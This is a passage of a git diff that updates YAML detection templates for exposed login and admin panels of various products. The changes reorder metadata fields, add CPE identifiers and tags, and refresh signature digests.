a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: - verified: true max-request: 2 shodan-query: title:"Audiobookshelf" + verified: true tags: panel,audiobookshelf,detect http: @@ -34,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205c2b8c821545d360dea78b15558d6e1976d17b27b05796ced518f11dc6180363022060d87a8c9d7338a79e7d0cd96f19ce47412e803f78353038942a590db85bcdcd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005d33f7b55e2318631d9a35582243793911cf44caa7570de0655afcb96b7c087022100d6627477aed96ce42ff3b817821d0634bc007f7e63aacb212eb9fefb95ec0367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index 43fd65a8af..31fd950bd3 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -7,12 +7,11 @@ info: description: AudioCodes login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.html:"Audiocodes" + verified: true tags: panel,audiocodes http: @@ -32,5 +31,4 @@ http: - type: status status: - 203 - -# digest: 4b0a00483046022100db69e40a219abf2acdb38b9db27bcc5f6f5644d701af8cd78b90336b63b92d2c02210082326ed3959bb561c1cc4527bfcf130d41d351e65a66d517685c05918355f0b0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b29ce2ad2ced6c154ef7287f7e2bf74247ed12c973fa8700cc3aa184f51f822702204420ed6a24a68b3a48b62a0eae4318e0333e1706241a6566136ab8166318a615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index 2ca8657997..fbdb95d748 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: - verified: true max-request: 1 shodan-query: title:"Login - Authelia" + verified: true tags: login,panel,authelia http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220490a5021967e030ff89ae16d4641c71e7eed70d1dd4ff6cd0f0194c789109b09022059bfbb46ae3a213be944bd8038a53d6fc66cd14351190788fbc8a035e9e6fbed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008fd87b39284e84d585bb9f507cbcbbe83b8d7e6cdd73eb30ac8401c192cd19a2022061c03f9d86a08c9af5bb06582714b9d38aed4e8e104af2045c44c95392e0e73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index aa1ea97634..a9d888edee 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: - verified: true max-request: 2 shodan-query: title:"Automatisch" + verified: true tags: panel,automatisch,detect http: @@ -32,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f85f212b29469d97f61c4c2e2414bf38eeee56faf0acb325d485a83bb441097202200944819fa0dbd30f1490c609750d410dcadfc7dffac01b3a789515c2b25457a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022035fe81f8489195b9067d4a0737e6e679ae53525803c06f578856012fdbdc1b100221008fd79bd81b27673d0a378a9f1cddf49f6c244e33a6087b2ee89cf09d85f71a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index 1a0a536627..d3d2b8c6d6 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -7,9 +7,9 @@ info: reference: - http://autoset.net/xe/ metadata: - verified: true max-request: 1 shodan-query: title:"AutoSet" + verified: true tags: tech,php,autoset,apache http: @@ -36,4 +36,4 @@ http: group: 1 regex: - 'AutoSet (\d+(\.\d+)+)\b' -# digest: 490a0046304402205e24faf94cdcfc4943f6a3e61717745673990ed09e44dc9fa5cfdb2372d8912e02201a9c524f619681858711cdccb96931d8bb85bf7f03b9397d34c07b79576467e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008749f06172560522b858602a0ab2e051598a9f3730cb7dd05f1d5dffa07b0ffc022007b0555f10f4c2d96fd37b2ff258e1c9281c56f3550a0c62f8560e312618b290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index 8c354171f7..f2ed76974b 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -9,13 +9,13 @@ info: - http://www.avantfax.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-668 + cpe: cpe:2.3:a:avantfax:avantfax:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: avantfax product: avantfax shodan-query: http.title:"AvantFAX - Login" + vendor: avantfax tags: panel,avantfax,login http: @@ -40,4 +40,4 @@ http: group: 1 regex: - '<p align="center">([0-9.]+)<\/p>' -# digest: 4b0a00483046022100c98d7714d0d4f8beb4b44e7dbf26b8d576cc5c7172162c34b5fa8644a041ad02022100b1d7c844d6c76ec7743a15da727781a9997d703dc88d21ccd0a61038055b4dc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003d52cbba47ec2c8b4cae0872a5686fcf27efbf8a2a2a39fe2115c6f081eeab802202b7e87d630edfeb150abae4f6aa8e98bd7cb820a1b36e56ab6e9335d650ea28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index a96e9f17ee..e8a90e426a 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -7,12 +7,12 @@ info: description: Avaya Aura Communication Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: avaya product: aura_communication_manager + vendor: avaya tags: panel,avaya http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2a93a50b015f7276789045baccc033b81bd512cedac9237bc0edfbd9d3b7ee60221009c40664f15386dec16433d6b62eeb2f2f3b5dd2572221bb3cc26410710a62654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0a006b0b4214b31341131bca90abeb5abc213959a6e4dfa8fecfb1083ec3c120220258a337d808718ec2a09df2e4af04a565aa2015ec8188979aa142e387c387d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index b7b845ef15..ad8275d351 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -7,12 +7,12 @@ info: description: Avaya Aura System Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:avaya:aura_system_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: avaya product: aura_system_manager + vendor: avaya tags: panel,avaya http: @@ -39,4 +39,4 @@ http: group: 1 regex: - "</sup> System Manager ([a-z0-9.]+)</h1>" -# digest: 4a0a00473045022100da0f80175fc616a873ce611c915626ada0197640e19945a17e74191fbba9bc8202203e7d25059b9704cfc94d4fe5b67db95c2f6f5e7d86ed0614277cab7c88c9a08b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220742c535fcf40b698ab4d4ac8550eecc886cdc968e67e6f78e7ac0d1dd3c602090220667eabb92d12f1e20876c1644b471fee43924eedcae0fd0a674e774d05a522e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index 800b116426..53e4233d1b 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -9,11 +9,12 @@ info: - https://docs.aviatrix.com/HowTos/controller_config.html classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: aviatrix product: controller shodan-query: http.title:"Aviatrix Cloud Controller" + vendor: aviatrix tags: panel,aviatrix http: @@ -33,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022075d1d767a56e302a78db8cb79cef3e32b7b35908ac1d801d54dbe16da7b6649402204f27b00b9cde8abfaf1e0a994184865dc577fc65baec2bca72b9277c1276239f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fe85a753a31b3a6089a43a85527b34f42000af5a8e49713e19f0e12ccce963d0220569f10add1384df4bd2795ebaa3001b2ded432e76b449e85f3a2a7cb1ae269ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index 72ff5b62b6..e685f90c2b 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -7,14 +7,14 @@ info: description: Avigilon login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: avigilon product: avigilon_control_center shodan-query: http.title:"Login - Avigilon Control Center" + vendor: avigilon + verified: true tags: panel,avigilon http: @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207906592e784ab6b8412b54a773566616475c6a2625cf5ff19ac7af21ed7cdc680221009a810f4e5d0d534a1ffa6c29ba1417f0ad3353b27876a5d5e7a861bfe491ad14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a1100925f10bb7cfe702541f9583ad536cc6c872506c7491640e88651156dd5022100ec00500bb98ccd4e20c1c974b7df6f1fbdc4bd59a0be92da627e5e2279950f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avtech-avn801-camera-panel.yaml b/http/exposed-panels/avtech-avn801-camera-panel.yaml index 809389be3d..5bdecc724f 100644 --- a/http/exposed-panels/avtech-avn801-camera-panel.yaml +++ b/http/exposed-panels/avtech-avn801-camera-panel.yaml @@ -9,7 +9,6 @@ info: - http://www.avtech.com.tw classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -33,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220128ea849d07db0ba701318babe04e77411f2143a9b0540124afe64de0c1b5084022058bc1e86a203ffe1473700549e4f91074d1061e9d488b899972598f83b873f96:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f481b6b05a3df5325901b7c1b77a7e0ea6dd64b055591f13fec9d36146d8a2102200f80cf6d216f386369a818da96131d1a8cb528bf65c734257d2bd0334e88c0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index 763198df93..bd21d67803 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 metadata: - verified: true max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" + verified: true tags: exposure,ec2,aws,amazon,panel http: @@ -29,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b0ab65f95163b2867f94617fad8d842c866c9592e065764a7c7aec4f161f6abc022100bb69136e3a2066879f0bcfe9e384cc89cfee1d682ea687bc7015702d03f22bdb:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022042b6830d8c26c3df2548e65415fb60d85296fc59f89b74296bd2078a845114230220711859145df6213f2dd6aaf26b64437279cfff99849e5a6c8d3900d1aa7bcaf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index a8b961c37e..57a2128475 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -9,13 +9,13 @@ info: - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:amazon:opensearch:*:*:*:*:maven:*:*:* metadata: max-request: 1 - vendor: amazon product: opensearch - tags: panel,opensearch,aws + vendor: amazon + tags: panel,opensearch,aws,amazon http: - method: GET @@ -31,4 +31,4 @@ http: - type: word words: - "Please login to OpenSearch Dashboards" -# digest: 4b0a004830460221009e828d5345f44f8ab35fd05807734f95e0183618c77c22e08b42412a61b712ad022100e74ef2bd4f68f0e2685f44dd93ab58ec218b22cf68bc36274771540782f7ebc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a545da3e16df9c30198e45761bd50b51f2e497bb38cb56da3c83608801fefbc8022045e5554e77ebb6d3bc952b7a79db1fdfb19d0bef9f53c9c228b4fc66566f5ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 01af495971..4bf951cac5 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -7,13 +7,12 @@ info: description: Axel WebServer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true + fofa-query: app="AxelWebServer" max-request: 1 shodan-query: http.title:"Axel" - fofa-query: app="AxelWebServer" + verified: true tags: panel,axel,webserver http: @@ -38,5 +37,4 @@ http: group: 1 regex: - 'Axel MyWeb (.*)' - -# digest: 4a0a0047304502203e83567d3a3ac6c442c916fda8ce773cefa2e7e50426af98aa6ce39035ab1a1d022100bebdec9ecd141b1dd06c0dbf3d17b70e7dc0daebc2cba88d6dd2fddc3f75be9e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210096153e74c6a2e5ac1654dba3ab425d62798426f6989aabf3d67a1971b7319c1502206fd9fb03d2f6bc24884cc51fa767485e2bfcdde7809c9f7c54733fff531f3fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index bbab0fdc9f..eb61cd9622 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -5,9 +5,9 @@ info: author: johnk3r severity: info metadata: - verified: true max-request: 1 shodan-query: http.title:"Axway API Manager Login" + verified: true tags: panel,axway,detect http: @@ -25,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d8e779d011c5770aa82c17b7d1f65689af155fcd1e406f51aa969077f372b924022100972f8620b0a3b8b55b59c7aa36b2184c24e158b24dc78107a0e6bddf09377134:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f790ccc7c9c6170ee0b96b3e5272ec02a6bc8ee343ec4499daf4127816d353a02202c947c2b21c5ca1e791f27387d89c6eb57b460dcc55ce8d0d18425efb5645de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index a449a5cb5f..91db597ee1 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -10,14 +10,14 @@ info: - https://www.axway.com/en/products/managed-file-transfer/securetransport classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: axway product: securetransport shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 + vendor: axway + verified: true tags: panel,axway,securetransport http: @@ -49,4 +49,4 @@ http: group: 1 regex: - '"SecureTransport", "([0-9.]+)",' -# digest: 4b0a00483046022100cbea39cefe44b275ee914732b3eb85e9adc396032587a562b9cf7d24ea483c5b022100967ca699692dba81d982185f2fc416cc49e7b124f311407a2023a27d7f13363f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ddfb542843f60c8c38397fb6a9c1f5f17c699dd6dd28a57af33a73e703fbb4202202e61be853e13b2bd760ee27dc860715d4f64225ab567be6301b93ab4945a9bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index b82b24717e..a26113b572 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -9,14 +9,14 @@ info: - https://www.axway.com/en/products/managed-file-transfer/securetransport classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: axway - product: securetransport google-query: intitle:"ST Web Client" + max-request: 1 + product: securetransport + vendor: axway + verified: true tags: panel,axway,securetransport,webclient http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078a875d95d9f95a5fb3711c616c7467ad5e5d618680716a88e1a54c8b34a5e4402206d92c7775284251ed031b12d7118ef60393f6da029130fca5dc206ba6abb53d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2af4e9ab70e4c0590f95e8328e0b1822647af1369ad37a2a5f8d881fd320c5a022100f9cd7ab9e9062175a6e078df81bdb18290a8fb2d1fec84782758ad276ac55a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index cdb8519103..81107ae2cc 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -10,13 +10,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:axxonsoft:axxon_next:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: axxonsoft product: axxon_next shodan-query: title:"Axxon Next client" - tags: panel,axxon,vms,login,detect + vendor: axxonsoft + verified: true + tags: panel,axxon,vms,login,detect,axxonsoft http: - method: GET @@ -33,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008caf1d03b29619e7eb9435eac7d4c802cbf17fc1ad6080a4b1ccd3c26c1fbb77022100d30bcaf05a75cf67f408ed0d6fab9f4d6d4ee5406d41079d42d825d6d595a450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008affae577adb0db5da7604e6a7c72f2b9651f9b054b394ba247a422f3ba802ea022100f6409861a449db44afc01753220df1e6de8414ce7ab930a5550ed893a9bce656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/backpack/backpack-admin-panel.yaml b/http/exposed-panels/backpack/backpack-admin-panel.yaml index cd7c1b64b6..8609b2c8ea 100644 --- a/http/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/http/exposed-panels/backpack/backpack-admin-panel.yaml @@ -8,12 +8,11 @@ info: Laravel Backpack admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: title:"Backpack Admin" + verified: true tags: panel,backpack,admin http: @@ -28,5 +27,4 @@ http: - 'Backpack Admin' - 'backpack_alerts' condition: or - -# digest: 4a0a00473045022100e1192e693bcd89900b4174f27a4febc78a81c1b5323570705590fe7c16d98230022048a78df077e6f463953cf5fbd24a87946e701c0ff21979c7856a4b180c08beff:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d3e64e2b982ee20697422c01bc6650eea924437cab9709055ce602b9130c72ef022100c8b853b48c80f432d0ca00cad02b507aff47df49a8f0fa6e6db61c89df420342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bazarr-login.yaml b/http/exposed-panels/bazarr-login.yaml index e34b156b17..7952214e15 100644 --- a/http/exposed-panels/bazarr-login.yaml +++ b/http/exposed-panels/bazarr-login.yaml @@ -9,7 +9,6 @@ info: - https://www.bazarr.media/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,5 +23,4 @@ http: - type: word words: - 'Bazarr' - -# digest: 4b0a00483046022100e7bd377d94871e8d9910aea2f3d6fe73492335b463249e735f894bfb8b57c95b022100a7679a4fc0c21517338fd01767f35359d966a96f1ede97a544c78d9fb3868871:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205d3f2d3db9e2e957c98f777a29a673b98669d4d44dfc757e306b1cf877d0d5c5022068beefffd24a8325d772a4a7760644c51297e8858d285c001f18070fc4085842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index c1cd03a8df..ddb5e1c160 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -9,13 +9,13 @@ info: - https://www.bedita.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:bedita:bedita:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: bedita product: bedita shodan-query: http.title:"BEdita" + vendor: bedita tags: panel,bedita http: @@ -40,4 +40,4 @@ http: group: 1 regex: - 'target="besite">(.*)
' -# digest: 4b0a004830460221009f6dc4958cf5a396215b1f6981a1ce4054fc47aa68d01667ceca63af6041c6e4022100aba0ee27daf63625852e63ea080d47afc9c8b39dc72d5176240f974d504aeafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfd4490a71cb9b8b3932060ec37eb1f5de6e1f48093b7c301727311d5af578fb022100e60a0b137d4b4847ae2a60df31d11734702dcaea8e6b45737c4ddb720bbd9b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index be1ba30993..22d1488037 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -12,12 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:beego:beego:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: beego product: beego shodan-query: html:"Beego Admin Dashboard" + vendor: beego + verified: true tags: panel,beego,unauth http: @@ -42,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058a4fa334d19559b6ac007bd649a59b6c4203432858631b0f4deb86aad082692022100aa4b5c126d3ce33d350ba088711bb452a7ff47dab619d787d7a040c8745114a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009f7965bc6043d9d83248d2e42e3d19cb5742d01d256cb5dc25dc0531f84db1d00221009998e1ccd239000a1a813daeb04b8240f13edc6fa17d95373fe90a2014fa079a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beyondtrust-login-server.yaml b/http/exposed-panels/beyondtrust-login-server.yaml index fb449479a2..9ee69b94e8 100644 --- a/http/exposed-panels/beyondtrust-login-server.yaml +++ b/http/exposed-panels/beyondtrust-login-server.yaml @@ -9,7 +9,6 @@ info: - https://www.beyondtrust.com/brand classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -38,5 +37,4 @@ http: json: - ".domains[] | .DomainName" - ".domains[] | .ldapservers" - -# digest: 4a0a00473045022100b2c3e6ac6b56555ebac3c5334096275e7e70982c4500b136c0e89fb2b421378d02201aca2353da6e9d6d15c681b3ebf72a4a4c7e3ba3be4774297814c1aa078e412d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220544784d274f6f0f84933a2d0db6005a75b66e1a27e4fc7630740b8fa03fa95ab02207d82a93e620c4ec70552eae707c7b55de2ff43e3136f72097cae51facc4e7604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/beyondtrust-panel.yaml b/http/exposed-panels/beyondtrust-panel.yaml index 51ba9617e7..8d7bb47905 100644 --- a/http/exposed-panels/beyondtrust-panel.yaml +++ b/http/exposed-panels/beyondtrust-panel.yaml @@ -7,7 +7,6 @@ info: description: BeyondTrust login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,5 +23,4 @@ http: part: body words: - "BeyondInsight" - -# digest: 4b0a00483046022100ede4ff332cf2ce4af86456e59f697662131fd1f20b60943d43df490b995be0b7022100ec23ddb57428ded66f69bf3167b7e248a6612253e16ab5dc6b31cf65cb8fcd93:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a7cc58d74372d8883f9dd19d8d74b2aef820ebfb585fc8c82b99446ea55fd61802210087b70c208e06248133c219d0b73cd243cf091b88e8db971b50f5a4cd26cfa30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigant-login-panel.yaml b/http/exposed-panels/bigant-login-panel.yaml index 23da217c89..4800120685 100644 --- a/http/exposed-panels/bigant-login-panel.yaml +++ b/http/exposed-panels/bigant-login-panel.yaml @@ -7,7 +7,6 @@ info: description: BigAnt admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -29,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa6e5721848b4150cdc827099952a65954f2b4a69b447b87f66562b44a69dc3e022100bd72b5df09f397b34c45de1e7b72421638e93ac6aa17788fa5f8994ced8f82b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e8bd76b75eb42eae04dd60f0440d573f652f5999dc8ec18073b450a514270f840220729b405e1689ac0382c5f308ec0e4fafc556d748cd3a74311efd2fd8e1e62ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 96d1907eee..4138ba3f2e 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -9,10 +9,11 @@ info: - https://github.com/bigbluebutton/greenlight classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:bigbluebutton:greenlight:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: bigbluebutton product: greenlight + vendor: bigbluebutton tags: panel,bigbluebutton http: @@ -34,4 +35,4 @@ http: group: 1 regex: - 'Greenlight<\/a>\. (.*)' -# digest: 4a0a0047304502200a0c0b771fb32b341335944aeeaa671559a06d76a4b190c145f532e81f89d3c4022100c345cf81127761d9d833521ec541a58d5a3fabdf4fd527a93e3e18949e012f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202190ecc43fb8bb246d538d76505f37e2915842ced04370651f91b7222f775bba02204de8e4463ca9fb19875e4712a07b51d1109d79641f6e606619fccb61a65b4433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index 